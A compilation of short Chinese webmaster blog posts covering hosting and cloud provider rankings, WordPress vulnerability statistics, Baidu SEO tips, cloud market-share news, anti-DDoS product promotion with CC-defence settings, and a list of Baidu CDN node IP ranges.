DDoS防御能力,不限并发,不限流量,价格也才3899元一年,敢这么干的估计全国也就百度一家了,总之非常牛批,百度云虚拟主机非常适合做竞价的,因为竞价经常被攻击,有了百度云虚拟主机就不怕了,而且据说用百度云虚拟主机可以增加收录速度,之前主机吧的刚建博客的时候也是用百度云的虚拟主机,不过后来博客流量上来了,虚拟主机就不适合了。 3.西部数码虚拟主机 西部数码的资源没有前面两家的好,机房都是托管别人的,速度也没有前面两家好,但是西部数码的售后是真的好,而且其虚拟主机非常丰富,功能齐全,属于老牌虚拟主机服务商了,对于处理一些虚拟主机售后问题非常有经验,支持虚拟主机自动转移服务器,可以做到无缝升级转移等,非常适合新手使用,所以主机吧把他排在第三位。 4.美橙互联虚拟主机 美橙跟西部数码一样都是很早就做虚拟主机了,其资源丰富,可选的机房非常的多,但是都空间容量和月流量都非常的小,性价比一般,不过售后也是非常的快,是主机吧接触过的服务商中除西部数码外,售后最快的服务商之一。 5.景安虚拟主机 景安虚拟主机的主要特点就是便宜,百来块钱就可以买到景安不错的虚拟主机了,国内空间更是便宜到60元一年,虚拟主机的功能也非常多,售后也还可以,唯一不好的就是速度访问一般,总之各方面还是不错的。 6.耐思尼克 这家公司是做自助建站为主,其的开发的建站宝盒非常强大,主机吧也曾买过他们家的建站宝盒,模板丰富,功能强大。而虚拟主机现在主要是使用百度云、阿里云、腾讯云的服务器配置的,速度是不错的,价格也便宜,之所以排在第6是因为主机吧有一次使用的时候出现一次故障,而耐思尼克解决了很久也没解决好,说是要联系百度云处理,这也是所有代理大厂服务器的悲哀,没有服务器完全控制权,很多东西没办法处理。 好了,以上就是主机吧对目前国内比较靠谱的虚拟主机服务商的一些推荐,其它的没接触过,不敢过多评论,目前纯虚拟主机、云服务商的生存空间是非常小的,因为市场份额已经被阿里云、百度云这类服务商给挤压了,主机吧前几年接触过的几家小型服务商都倒闭了,像华夏名网这种老牌服务现在都是代理别人家产品生活了,所以大家尽量使用大厂,或者是有实力的有盈利点的服务商,像美橙互联、耐思尼克现在都不是主打服务器的,都是做自助建站的,西部数码估计也看到这类问题,前两年也出了云建站,而西部数码本身靠着卖域名也是挺赚钱的,所以不用担心倒闭问题,其它那些小型服务商就不好说了。 #### 2020年比较靠谱的云服务器商 之前写过一篇关于靠谱虚拟主机的文章,今天我们再来谈谈云服务器商的靠谱排名,纯经验谈,希望可以帮助大家如何正确实选择云服务器。 1.腾讯云服务器 很多人会疑问,为何第一不是阿里云,毕竟阿里云国内市场占有率第一,这里主机吧说下,虽然阿里云市场份额国内第一,但是在我看来很多方面做得不如腾讯云的,腾讯云价格不仅便宜,而且资源丰富,很多搞微信小程序的都会选腾讯云,毕竟微信就是运行在腾讯云上的,所谓近水楼台先得月,是有响应加持的,而且腾讯云在很多方面都是比较人性化的,比如可以随时更换IP,这点阿里是不支持的。还有腾讯云可以绑定微信APP,可以实现实时监控管理云服务器的操作,非常方便。至于稳定和速度其实排前十的服务商都差不多的,腾讯云售后也比较专业。所以这里把腾讯云排第一。 2.阿里云服务器 毫无疑问阿里云在国内的市场份额绝对是排名第一,而且遥遥领先第二名的腾讯云,但是主机吧想说的是阿里云其实更多的是先发优势,毕竟是国内第一个大力推广云服务器的商家,份额第一是很正常的,但是其实力其实跟腾讯云互相伯仲。很多时候别人之所以选择阿里云是因为阿里云365天,天天都有低价活动,双11更是便宜,4核8G5M的配置可以卖几百块一年,也就阿里云有这实力,毕竟运行着淘宝天猫这样的商城,资源可以说是非常丰富的,阿里云机房也非常多,海外机房甚至比腾讯多得多,当然阿里云缺点还是有的,这也是为何主机吧把阿里云排第二的原因,阿里云的后台操作是非常繁琐的,控制台给人进去就找不到北的感觉,即使是主机吧这样的已经习惯阿里云后台的人,有时候也是有种迷失的感觉,经常找不到云服务器,得切到相应的区才可以找到,还有很多功能,看上去很高大上,事实上你根本用不着,比如安全中心,得看着教程一步一步点才找到,否则你可能找半天也找不到这东西。还有阿里云不支持更换IP,这点非常不安全,如果你被人DDoS了,想防御,又换不了IP相当麻烦的事,还有之前主机吧就说过,阿里云的IP段经常被黑客扫描,甚至暴力破解,如果你密码设置的简单了那就小心了,被入侵的几率相当大。抛开这些阿里云服务器还是相当靠谱的,速度、稳定性,售后都是可以肯定的,说到售后,阿里云的工程师有时候是要收费的,是他的服务范围他会给你服务得非常好,如果不是他的服务范围,那不好意思,一分都不帮,你要是硬要他帮,那行,付服务费吧,几百几千不等。 3.百度云服务器 主机吧一直觉得百度云是最可惜的,本身就有云的基因,却因为领导当初看不起云计算,导致失去先机,就主机吧自己体验而以,这么多公司就百度云服务的能力相当了得,主机吧的博客就是用百度云服务器运行的,就主机吧的感觉而言,稳定性甚至比阿里腾讯云还好,两年了没有故障过,甚至连停机维护都没有,而且速度一如既往的快,想想也是,毕竟运营着全球第四大流量的搜索引擎网站,而且还运营着带宽消耗大户百度网盘,如果没实力的话,早就废了。近两年百度也开始重视云服务市场了,去年还把云计算部门提升至重要地位,同等于百度搜索一样重要,可见百度方面想靠云计算翻身的。跟阿里云腾讯云比,百度的可选机房是相当少的,海外也只有香港和新加坡机房,所以市场份额比不上前两家,甚至前5都排不上,但是其实力是有的,而且随着百度的重视,市场份额已经在快速增涨了,未来估计国内云计算前五会有百度的一个位置。 4.华为云服务器 跟前面几家比,华为很明显是一家硬件公司,华为云官网也非常突然了硬件的特色,介绍CPU型号、 基频/睿频、 最大网络收发包、最大内网带宽都会写得清清楚楚,让人一看,哇,好专业! 主机吧有用过一次华为云服务器,是免费送的,速度还是不错的,稳定也不错,售后因为只提交过一次工单,反映速度还是很快的。主机吧之所以推荐华为云服务器的原因是之前用过他们家的CDN和高防DDOS IP, 还有域名DNS服务,非常好用!特别是DNS服务器,主机吧可以肯定全国没有哪家DNS服务商有华为云这么良心了,别人家收费的功能,华为云全部免费提供,而且比别人收费的还好,非常棒!   好了,如西部数码、景安、美橙互联这类云服务商主机吧就不推荐了,当然要求不高的同学可以试试,至于其它云服务商主机吧没接触过,所以不推荐,总得来说上面写的四家公司的云服务器绝对是非常靠谱的,如果你有细心就会发现,云服务器商家基本都是有钱人玩的,上面说的四家哪一家不是超级有钱的,没有钱根本运营不来云服务器,连自建机房的钱都没有,谁还敢把东西放你那? #### 2020年超过580个WordPress漏洞被披露 根据网站安全公司 Patchstack(前身为 WebARX)的一份新报告,2020年有超过580个 WordPress 漏洞被披露,但其中绝大部分影响到第三方插件和主题,而不是 WordPress 核心。 该报告是基于 Patchstack 的 WordPress 漏洞数据库的数据,其中包括该公司的内部研究团队及其漏洞赏金社区、第三方网络安全供应商和独立安全研究人员收集的信息。值得注意的是,WordPress 内容管理系统(CMS)驱动着互联网上40% 以上的网站,用户有数以万计的插件供他们使用,以实现各种功能。 对去年披露的漏洞分析表明,在582个独特的问题中,超过96% 的问题实际上影响了第三方主题或插件,其中许多主题或插件被数百万个网站所采用。在插件中发现了470多个安全漏洞,只有22个影响了 WordPress 核心 —— 其余的都只影响了主题。 Patchstack 还分析了5万个 WordPress 网站,发现它们平均使用了23个第三方插件,平均会有4个插件没有更新到最新版本。Patchstack 在其报告中写道:"网站上每多安装一个插件,暴露在潜在漏洞中的风险就会增加。网站更新滞后的事实更增加了风险"。 跨站脚本(XSS)漏洞是最常见的,其次是 SQL 注入、跨站请求伪造(CSRF)、信息泄漏和任意文件上传漏洞(如下图所示)。 Patchstack 表示,根据今年通过其漏洞赏金计划提交的漏洞报告,截止到目前为止发现的漏洞数量相比2020年似乎有所增加。 #### 2020网站如何提高百度排名百度权重? 对于SEO行业来说,注重的是网站在百度的排名,然后很多绞尽脑汁想提高网站在百度的权重,网站权重是审核一个网站的质量的标准以及审核网站流量的一个标准,网站流量越高,权重就越高,网站的效果也就越大!那么如何提高网站的百度权重呢?下面我们一起来分析一下。 网站如何提高百度权重? 第一、网站内容 做SEO的都比较清楚,网站内容对于一个网站排名的影响巨大,对于提高百度权重来说影响也是很大的,想要提升网站的百度权重,网站内容必须丰富以及内容的多样化,这样百度对于你网站的信任度相对较高。 第二、网站结构 想要提升百度权重,网站结构思路必须的清洗,要让网站在百度大数据中脱颖出,这就包括导航清晰,代码精简,结构样式等,让网站对用户的吸引度较好,在网站的停留时间较长,从而百度对于你网站的认可度就相对较高。 第三、外链广阔 百度对于网站权重的判定方式就是流量,外链是引导网站流量一个重要的方式,所以对于网站外链数量以及质量需求很大,所以外链广阔,是提高百度权重比较好的方式之一。但是发布外链也是有一定要求的,可以参考本博客的如何发布外链的介绍。 第四、长尾词堆积 一般做SEO优化人员,很多都只是看重网站关键词的排名,经常忽略网站长尾词的布控,但是对于提升网站权重来说,网站长尾词堆积是必不可少的,一般长尾词越多,对于网站权重的提升就越快。对于这点也可参考本博客对于网站长尾词的介绍。 第五、友情链接布控 每个网站都有会交换友情链接,对于提高百度权重来说,交换友情链接最好的方式就是找一些网站权重比较高的网站交换,当然,对于这些很多网站不怎么愿意,也可以适当的用点资金交换一下,这对于网站权重的提升还是很有必要的。 对于如何提高网站权重,把以上几点做好,网站权重基本就可以上升一到两个点,还值得注意的一点就是心急则无,网站权重值和网站优化是一个道理,必须花费大量的时间去积累,才会慢慢有效果。 2020年主机吧这里祝各位站长网站权重越来越高,网站排名越来好,流量越来越多! #### 2020高考成绩今日开始放榜 百度App等可查分 7月23日消息,今日起全国多地2020年高考成绩开始陆续放榜,考生也可以开始查询分数。为方便考生和家长及时查询成绩,除了各地教育考试院官网外,百度App、支付宝、微信等均开通了查分入口。 目前,百度高考服务平台为考生提供官方高考查分服务,考生在百度App搜索“高考查分”、“高考成绩查询”、“高考”等关键词,即可进入高考查分模块,并于公布高考成绩后进行分数查询。 为帮助广大考生提供全面、便捷、权威的志愿填报参考,百度推出一系列志愿填报相关服务。其中,百度AI志愿助手整合、分析全国2600余所高校、1400多个本专科专业、近8年共700多万条招生数据,考生在获取高考分数后,可通过AI志愿助手查看自己分数在本省的排名区间,并与往年报考情况进行对照分析,参考往年同位次可报考的院校以及推荐志愿。 全国各地高考查分时间: 7月23日放榜地区: 广东、广西、上海、甘肃、宁夏、湖北、四川、云南、江西、河北、内蒙古 7月24日放榜地区: 重庆、山西、贵州、陕西、福建、江苏、黑龙江、新疆 7月25日放榜地区: 北京、河南、湖南、青海 7月26日放榜地区: 吉林、天津、山东、浙江 待公布地区: 安徽、西藏、辽宁、海南 #### 2021 上半年中国网络安全服务市场规模实现 110% 的增长,达到 71.5 亿元 2021年10月12日,IDC发布的《2021上半年中国IT安全服务市场跟踪报告》显示:2021上半年中国IT安全服务市场厂商整体收入约为11.1亿美元(约合71.5亿元人民币),厂商收入规模较去年同期实现翻倍增长,涨幅高达110%,较2019年同比增长38%,中国IT安全服务市场正式进入需求全面爆发期。安全咨询服务:属于专业服务的范畴,具体包括安全战略与规划、合规与审计、安全策略评估与开发、测试类服务、应急响应服务等多个咨询服务类别。托管安全服务:安全服务提供商通过安全运营中心(SOC)进行全天候远程管理或监控的IT安全服务。服务范围包括部署在本地、外部数据中心和云上的托管安全服务。IT安全教育与培训服务:IT安全教育与培训服务是一个教育活动和过程,其中包括企业级培训服务(包括安全意识培训、安全技能培训、大型赛事、安全靶场等服务)、教育认证(包括认证培训、认证考试等)和高校教育三个子市场。企业级培训服务市场:安全集成服务:是技术服务提供商通过规划、设计、实施、项目管理四个步骤形成完整安全解决方案的服务,它涉及系统和应用程序的定制化开发,以及集成企业打包的安全硬件、软件服务等。 #### 2021 年中国云市场份额:阿里云37%、华为云18%、腾讯云16%、百度智能云9% 3 月 21 日消息,Canalys 发布报告称,2021 年中国大陆势头强劲,云基础设施服务市场增长 45%,总计达到 274 亿美元。其中 2021 年第四季度同比增长 33%,达到 77 亿美元。 ▲ 图自 Canalys,下同 Canalys 预计,到 2026 年,中国大陆的云基础设施市场将达到 850 亿美元,五年复合年均增长率将达到 25%。 报告指出,阿里云在 2021 年依然稳居云市场巨头的宝座,华为云和腾讯云分别位列第二和第三。百度智能云占据第四名宝座。2021 年,头部的四大云厂商占据了 80% 的市场份额。具体来看: 阿里云占云基础设施服务市场总支出的 37%,领跑市场。华为云的市场份额达到 18%,年度增长达到 67%。第三大厂商腾讯云,市场占比 16%,增长了 55%。第四大厂商百度智能云,市场占比 9%,同样增长了 55%。 #### 2021中国IPv6创新发展大会:工信部鼓励信息通信业与金融等行业合作 10月11日消息:今天2021中国IPv6创新发展大会在京召开,工信部总工程师韩夏出席并致辞。 韩夏强调,下一步,行业各方需合力做好三方面工作:一是加快规模部署,提升服务能力,协同推进云、管、端、用等各环节IPv6深化改造。二是深化融合应用,赋能行业发展,鼓励信息通信业与金融、教育、医疗、能源等行业开展更大范围、更深层次的IPv6协同创新。三是着力创新突破,完善产业生态,促进产业整体发展水平提升。 此前据证券日报报道,近日已有多个省市发布最新部署:天津市印发2021-2022年度深入推进IPv6规模部署和应用工作安排,提出到2022年网络承载能力显著增强,IPv6网络关键指标不劣于 IPv4;移动网络IPv6活跃用户数超过1800万,固定宽带网络IPv6活跃用户超过290万,城域网IPv6流量占比超过5%。福建省关于贯彻落实的通知将于近期正式印发实施,相关实施方案将促进IPv6流量规模持续提升。另外,山东省委网络安全和信息化委员会办公室拟进行全省IPv6规模部署进展情况评估。 #### 2021二季度中国云服务市场占有率:阿里云、华为云、腾讯云前三 9 月 14 日消息 Canalys 发布了中国云计算市场 2021 年第二季度报告。 报告显示,2021 年第二季度,中国云基础设施市场增长 54%,达到 66 亿美元。阿里云、华为云、腾讯云和百度智能云分别以 33.8%、19.3%、18.8%、7.8% 的市占率位列前四名。 四大云服务提供商二季度总体增长 56%,占云计算总开支的 80%。其中,百度智能云的增速高于整体市场增速,同时也高于四大云服务提供商的总体增长率。 据了解到,二季度全球云服务市场中,亚马逊云科技、微软 Azure、谷歌云位列前三,三大云服务提供商在 2021 年第二季度的总支出中共占 61% 的比重。 #### 2021全球访问量最高网站排行榜 国外SimilarWeb数据平台报到,2021中季度全球访问量最高的网站榜单出炉了,Google排第一,国内唯一上榜的网站“百度”排第七! 以下是SimilarWeb统计的2021中季度全球访问量最高的网站排行榜单: 1.google.com,网站访问量:90.89b 2.youtube.com,网站访问量:34.64b 3.facebook.com,网站访问量:22.38b 4.twitter.com,网站访问量:6.75b 5.instagram.com,网站访问量:6.21b 6.wikipedia.org,网站访问量:5.87b 7.baidu.com,网站访问量:5.75b 8.yandex.ru,网站访问量:3.69b 9.yahoo.com,网站访问量:3.63b 10.xvideos.com,网站访问量:3.33b 11.whatsapp.com,网站访问量:2.87b 12.xnxx.com,网站访问量:2 58b 这份数据其实并不准确,因为微博、360、QQ等网站流量也不会比上面一些网站低,不过百度的流量确实排国内第一,但也仅限于网站了。 #### 2021年Windows系统将彻底不支持Adobe Flash Player 正如 2017 年夏天首次宣布的那样,Adobe Flash Player 正走向终结。微软本周发布了关于这个情况的补充说明,向 Edge(经典版和新版)和 IE 11 用户发布通知,表示 Flash Player 将会在 2020 年年底停止运行。 如果你曾经通过 Windows Update 在设备上获得“适用于 Adobe Flash Player 的安全更新”,那么在 12 月之后将不再接收到此类更新。自 2021 年开始,微软将不再向任何用户发送任何此类消息。从 2021 年 1 月起,Adobe Flash Player 将被默认禁用,所有 2020 年 6 月之前发布、比 KB4561600 更老的版本将被屏蔽。 在 2021 年夏季,经典版 Edge 和 IE 11 将会完全移除所有“专门管理Adobe Flash播放器行为”的用户接口、组策略和 API。届时,微软将会通过累积更新的方式进行修复。 在Windows 8.1、Windows Server2012 和Windows Embedded 8 Standard上,上述删除将随 Internet Explorer 11 的累积更新或 "月度更新汇总"一起进行。 在未来一段时间内,所有累积更新和 "月度更新汇总"更新中都会包含一个 "删除Adobe Flash Player的更新"组件。 所以各位站长如果网站的播放器还是用Adobe Flash Player的,赶紧更换了吧,以免到时造成影响。 #### 2021年中国IDC市场占有率排行:阿里云第一,华为腾讯云并列第二? 今天在卢松松博客看到一个很有意思文章,大概是说: 2020年市场占有率排名第一的IDC服务商,依然是稳坐市场老大的阿里云,阿里云占据整个国内IDC大盘的将近40.6%的市场份额,远远跟其他几家IDC服务商拉开距离,可以说阿里云几乎占据国内的IDC市场半壁江山!排名第二的IDC服务商,以前一直是腾讯云,不过这次腾讯云有压力了,因为根据IDC中国最新放出的数据显示,这次国内IDC排名第二的是有华为云和腾讯云并列的,其中华为云占据整个国内IDC大盘将近11.0%,腾讯云也是占据11.0%的份额 对于阿里云排第一,没什么争议,而对于华为云和腾讯云并列的第二,这就挺有争议了,因为以主机吧的接触面来说,华为云的市场占有率应该是比不过腾讯云的,起码在网站建设圈内,华为云绝对没有腾讯云使用率高。虽然这几年华为云有很大的进步,价格也相当实惠,营销也非常到位,但是云服务市场是一个品牌影响力非常高的行业,一但形成品牌效应, 中小企业基本都是不需要思考来选择的,而阿里云腾讯云这两个头部云服务商几乎都是中小企业的首选,所以华为云突然串出来,主机吧挺意外的,虽然华为的品牌影响力也不差,但是主机吧还是认为这里的水份很大。 当然也不排除是主机吧落伍的原因,总得来说,华为云的加入,对云计算行业来说是非常有利的,阿里云估计也会有压力,像以前没有竞争对手的时候,阿里云是经常套路新老客户的,被圈内人士戏称“套路云”,这这两年改善了很多,而且售后也改了,不再是刻板的工单模式了,现在都是可能即时通讯了。 #### 2021年做网站还有前途吗 新网站要如何获取搜索引擎流量 很久没有静下心来写一篇文章了,因为太忙了,有空的时候却没有灵感,写博客多年很多该写的东西都写完了,没有新意的东西就懒得写了。 刚好今天查看统计的时候发现有人在百度搜索:2021年做网站还有前途吗 这个词进入了主机吧,所以今天我们就来聊聊这个话题。 首先我们来回答这个问题:2021年做网站还有前途吗?   我的答案是:有 虽然做网站已经不是主流,但内容搜索一直都在,有搜索需求在,网站就有发展的空间。 以主机吧的博客为例,以前都是每日几百IP的流量,现在每天都保持在1000IP以上访问量,虽然看着流量少,但不要忘了主机吧博客的行业本来搜索量就少,而那些有大搜索量的网站呢?如果做得好,流量是可观的。 当然,目前来说新做的网站想要获取流量是非常难的,国内整个互联网处在一个走向封闭式的道路。百度腾讯都把流量导入自家产品上了,所以想要从他们家获取流量是会越来越难,但并不意味着自己的独立网站就没有生存空间了。 那要如何获取流量呢? 1.域名选择 很多网站其实都是死在开头的,做了两三个月看到搜索引擎不收录,就没心情干下去了。一个好的域名可以让你网站更快的被搜索引擎收录,主机吧推荐使用COM、CN后缀的域名,而且最好是注册很久的域名,千万别用那些非主流后缀域名,搜索引擎连看都不看的,更别说收录了。 2.网站要备案 一个值得信任的网站,一定要在国内备案,并且使用国内服务器,这很重要。大家千万别为了省事,选香港主机美国主机,百度即使收录了,排名也不会很高,百度站长平台里填写域名备案号都是必须的。 3.网站部署SSL证书 百度已经明确表示做SSL是可以提升排名的,如果你的网站没有做SSL,那只能说明你落伍了,一个落伍的网站是没有前途的。 4.网站必须适应移动访问 2021年了,如果网站还是只有PC页的话,那是不可能获得搜索引擎青睐的,要知道移动访问量现在远高于PC访问量,百度也非常注重移动端,所以给自己网站给个移动在独立站,或者自适应页面才能获取更多流量,有条件的做个小程序,靠着微信小程序、百度小程序获取更多流量。 5.坚持原创 如果你还是只会复制粘贴采集别人的文章,那么我劝你还是放弃做网站吧,做网站不是搬砖,百度已经多次调整规则,对采集网页进行打击,你可以适当复制别人的东西,但不能全部都是别人东西,而且还是烂大街的东西,要适度采集,尽量原创。只有这样才能获得搜索引擎的青睐,访客也会多在你网站停留。 6.适当做外链 外链可以引来更多的蜘蛛访问你的网站,加快收录你的网页,同时如果获得高质量外链的话,是可以提升网站关键词排名的,所以如果你知道哪个大型网站可以放外链的,一定要偷偷做着,别让别人发现了,因为一但人多,自然会被禁,一个和尚有水喝两个和尚抬水喝三个和尚没水喝道理要懂。当然我们也不能大量做外链,会被搜索引擎惩罚的。 7.服务器空间要稳定 要保证搜索引擎蜘蛛能稳定抓取你的网站内容,不要连蜘蛛都进不去的服务器,更别说收录了,内容做得再好,外链做得再多,一直故障的话,所有的努力都白费了,所以服务器很重要,有条件的,尽量做CDN,CDN不仅可以让你的网站访问快,同时提升服务器稳定性,甚至可以减少DDOS攻击风险。 8.坚持坚持再坚持 新网站想要获取搜索引擎流量是非常困难的,难到你可能几个月都没有几个人访问,收录更是难上加难,所以坚持很重要,想要挣快钱的,那就只能花钱买竞价,买广告了。但那不是我们的目标,我们的目标是免费获取流量,那自然搜索流量是最理想的,所以我们要做好坚持半年没有什么流量的准备,只要检查让搜索引擎信任你的网站,流量自然没什么问题。注意少折腾多做事,即多做网站内容,少折腾网站模板,主机吧发现很多同学喜欢折腾网站模板,一会这个模板漂亮,改一下,一会这个功能强大,改一下,搞来搞去网站内容没多少,时间全花在搞网站程序上去了。实际上搜索引擎要的很简单,只要内容好就行了,别的什么模板漂亮,功能之类的搜索引擎根本不会知道的,用户也很少会花时间来体验你的模板。   好了,今天就到这了,有问题可以留言,欢迎大家一起探讨。   #### 2021年微信可能被封号规则 1、连续一周每天发布(图片或金融类字眼的消息)7条以上的微信用户。 2、注册时间一年以内,好友数量2000以上的微信用户,没绑银行卡的优先封号。 3、连续4周不切换IP地址、位置信息不曾变过的微信用户。 4、群发消息一个月内,每周超过2次的微信用户 5、每周好友增加数量在20以上的微信用户 6、与多个陌生好友(非手机号或扫二维码添加的好友)频繁互动的微信用户 7、每天有点赞行为,或多次发朋友圈的,并持续一周记录的微信用户。 8、同质化内容(包括字眼及图片,主要针对微商)发布超过一个月以上的微信用户 9、大量微信转账(每周1万元以上),大量群发红包(每周2000以上)的微信用户 10、建群数量超过20的微信用户(群很活跃)。 11、入驻多个群(超过20个),在群里不断添加好友在20人以上的微信用户。 12、频繁被拉黑,每月超过20次以上的微信用户。 13、朋友圈被屏蔽人数超过20人以上的微信用户。 基本上看完新规,可以确定,封号对象主要是违规的公众号、营销号、微商等等,当然了,涉及黄色、政治的账户被封,这些都是大家心照不宣的常识。 文章来源:https://lusongsong.com/yulu/t/14402.html #### 2021年我国主要商业网站及移动互联网应用IPv6支持率达80.7% 1月29日消息:据网信中国消息,2021年,各地区、各部门加强统筹协调,压实工作责任,制定政策标准,完善安全保障,强化整体推进,推动IPv6规模部署和应用取得明显进展。 监测显示,截至2021年12月底,我国IPv6活跃用户数达6.08亿,占网民总数的60.11%。物联网IPv6连接数达1.4亿,移动网络IPv6流量占比达35.15%,固定网络IPv6流量占比达9.38%,家庭无线路由器IPv6支持率达16%,政府门户网站IPv6支持率达81.8%,主要商业网站及移动互联网应用IPv6支持率达80.7%。主要年度指标超额完成,呈现出良好发展势头。 数据还显示,截至2021年12月底,我国国内网民使用频度较高的200款移动应用程序(APP)均支持IPv6访问,平均IPv6流量占比达52.89%,其中87款APP的IPv6流量占比超过65%。 #### 2021年最值得推荐的DDOS/CC攻击防御产品 好久没有写关于防御DDOS/CC攻击的文章了,主要是基本千变一律,价格也偏贵,也没有什么特别好介绍的。 不过百度最近新出了独立IP高防,价格相当实惠,值得推荐。 主机吧了解到新版的独立IP配置相当强,最大可防御100G峰值,同时独享100M带宽,还支持自义端口。有点类似于阿里云的高防IP服务,只不过百度云加速同时也提供多IP CDN服务,集成加速、高防一体。 这个配置放到阿里云高防IP价格起码得几万块一个月,主机吧不大清楚为何百度能卖这么便宜,但是这防御能力确实强,比之前的共享防御CDN强很多,之前百度云加速对于超大CC攻击以及大型DDOS攻击是没办法防的,比如从所周知的七色光攻击是无法防御的,而用了新出的独立高防IP版后,稳稳的防御住了,而且主机吧发现新看到的独立IP是BGP多线路的,由于独享100M带宽,访问速度并不比多IP的CDN差,节点也稳定,新支持的自义端口更是解决一些非标准端口业务不支持的痛点。 有需要防御的同学可以找我开通,百度云加速高防版商务版官方价6990元/年、企业版23988元/年,主机吧代理有优惠价,欢迎咨询!     #### 2021年百度云加速如何防御CC攻击 今年以来百度云加速有许多变更,比如跟Cloudflare分家了,目前已经不提供海外节点了,所以很多功能也取消了,虽然总体来说功能上没啥变化,但是防御低了很多。考虑到一些变化,所以这边写下如何防御CC攻击。 首先在保证源IP没有暴露的情况下,我们接入百度云加速。 1.进入安全功能,WAF,把 Web应用防火墙 、 安全验证有效期 (调为5分钟)、 浏览器检查 、 防盗链  这些功能开启; 2.进入安全功能-ADS- CC防护  调为强力防护模式 目前百度云加速的基本套餐很容易被CC攻击超量,如果被攻击超量可临时购买独立IP进行防御,配置100G DDOS防御 100M独享带宽 需要的可联系主机吧购买,价格优惠。购买后直接在安全功能-ads- 超级清洗中心 -高防设置开启即可。 需要注意的是开启超防设置如果你的网站有HTTPS的,则需要上传泛域名证书。 #### 2021年百度云加速最新节点IP段全集 111.32.135.1-111.32.135.255,百度云加速天津节点 111.32.136.1-111.32.136.255,百度云加速天津节点 125.39.174.1-125.39.174.255,百度云加速天津节点 125.39.239.1-125.39.239.255,百度云加速天津节点 125.39.238.1-125.39.238.255,百度云加速天津节点 42.81.6.1-42.81.6.255,百度云加速湖北节点 42.81.8.1-42.81.8.255,百度云加速湖北节点 42.81.15.1-42.81.15.255,百度云加速湖北节点 42.81.16.1-42.81.16.255,百度云加速湖北节点 122.190.1.1-122.190.1.255,百度云加速湖北节点 122.190.2.1-122.190.2.255,百度云加速湖北节点 122.190.3.1-122.190.3.255,百度云加速湖北节点 111.174.63.1-111.174.63.255,百度云加速湖北节点 111.174.61.1-111.174.61.255,百度云加速湖北节点 119.84.92.1-119.84.92.255,百度云加速重庆节点 119.84.93.1-119.84.93.255,百度云加速重庆节点 113.207.100.1-113.207.100.255,百度云加速重庆节点 113.207.101.1-113.207.101.255,百度云加速重庆节点 113.207.102.1-113.207.102.255,百度云加速重庆节点 221.178.56.1-221.178.56.255,百度云加速重庆节点 221.178.57.1-221.178.57.255,百度云加速重庆节点 221.178.58.1-221.178.58.255,百度云加速重庆节点 180.163.188.1-180.163.188.255,百度云加速上海节点 180.163.189.1-180.163.189.255,百度云加速上海节点 101.227.206.1-101.227.206.255,百度云加速上海节点 101.227.207.1-101.227.207.255,百度云加速上海节点 180.163.113.1-180.163.113.255,百度云加速上海节点 180.163.154.1-180.163.154.255,百度云加速上海节点 180.163.153.1-180.163.153.255,百度云加速上海节点 163.53.89.1-163.53.89.255,百度云加速上海节点 117.34.13.1-117.34.13.254,百度云加速西安节点 117.34.14.1-117.34.14.255,百度云加速西安节点 117.34.28.1-117.34.28.255,百度云加速西安节点 117.34.60.1-117.34.60.255,百度云加速西安节点 117.34.61.1-117.34.61.255,百度云加速西安节点 117.34.62.1-117.34.62.255,百度云加速西安节点 61.182.137.1-61.182.137.255,百度云加速河北节点 61.182.136.1-61.182.136.255,百度云加速河北节点 120.52.29.1-120.52.29.255,百度云加速河北节点 120.52.113.1-120.52.113.255,百度云加速河北节点 220.195.22.1-220.195.22.255,百度云加速河北节点 220.195.21.1-220.195.21.255,百度云加速河北节点 112.25.89.1-112.25.89.255,百度云加速江苏节点 112.25.90.1-112.25.90.255,百度云加速江苏节点 112.25.91.1-112.25.91.255,百度云加速江苏节点 58.211.2.1-58.211.2.255,百度云加速江苏节点 58.211.137.1-58.211.137.255,百度云加速江苏节点 117.148.160.1-117.148.160.255,百度云加速杭州节点 117.148.161.1-117.148.161.255,百度云加速杭州节点 124.160.160.1-124.160.160.255,百度云加速杭州节点 101.71.55.1-101.71.55.255,百度云加速杭州节点 101.71.56.1-101.71.56.255,百度云加速杭州节点 183.232.51.1-183.232.51.255,百度云加速广州节点 183.232.53.1-183.232.53.255,百度云加速广州节点 157.255.25.1-157.255.25.255,百度云加速广州节点 157.255.26.1-157.255.26.255,百度云加速广州节点 119.32.27.1-119.32.27.255,百度云加速广州节点 119.188.97.1-119.188.97.255,百度云加速济南节点 119.188.9.1-119.188.9.255,百度云加速济南节 119.188.14.1-119.188.14.255,百度云加速济南节 119.188.70.1-119.188.70.255,百度云加速济南节 119.188.132.1-119.188.132.255,百度云加速济南节 119.167.246.1-119.167.246.255,百度云加速青岛节点 150.138.149.1-150.138.149.255,百度云加速青岛节点 150.138.150.1-150.138.150.255,百度云加速青岛节点 150.138.151.1-150.138.151.255,百度云加速青岛节点 59.51.81.1-59.51.81.255,百度云加速湖南节点 220.170.184.1-220.170.184.255,百度云加速湖南节点 220.170.185.1-220.170.185.255,百度云加速湖南节点 220.170.186.1-220.170.186.255,百度云加速湖南节点 61.155.149.1-61.155.149.255,百度云加速苏州节点 61.155.165.1-61.155.165.255,百度云加速苏州节点 183.60.235.1-183.60.235.255,百度云加速佛山节点 116.31.126.1-116.31.126.255,百度云加速佛山节点 116.31.127.1-116.31.127.255,百度云加速佛山节点 183.61.236.1-183.61.236.255,百度云加速东莞节点 14.17.71.1-14.17.71.255,百度云加速东莞节点 119.147.134.1-119.147.134.255,百度云加速东莞节点 112.29.157.1-112.29.157.255,百度云加速合肥节点 112.29.158.1-112.29.158.255,百度云加速合肥节点 112.29.159.1-112.29.159.255,百度云加速合肥节点 61.241.118.1-61.241.118.255,百度云加速湖州节点 101.69.175.1-101.69.175.255,百度云加速湖州节点 61.241.118.1-61.241.118.255,百度云加速湖州节点 42.236.93.1-42.236.93.255,百度云加速郑州节点 42.236.94.1-42.236.94.255,百度云加速郑州节点 42.236.7.1-42.236.7.255,百度云加速郑州节点 124.95.168.1-124.95.168.255,百度云加速沈阳节点 124.95.188.1-124.95.188.255,百度云加速沈阳节点 124.95.191.1-124.95.191.255,百度云加速沈阳节点 115.231.186.1-115.231.186.255,百度云加速宁波节点 115.231.187.1-115.231.187.255,百度云加速宁波节点 122.246.5.1-122.246.5.255,百度云加速宁波节点 183.61.177.1-183.61.177.255,百度云加速广东节点 183.61.190.1-183.61.190.255,百度云加速广东节点 112.13.71.1-112.13.71.255,百度云加速绍兴节点 112.13.72.1-112.13.72.255,百度云加速绍兴节点 222.216.190.1-222.216.190.255,百度云加速南宁节点 219.159.84.1-219.159.84.255,百度云加速南宁节点 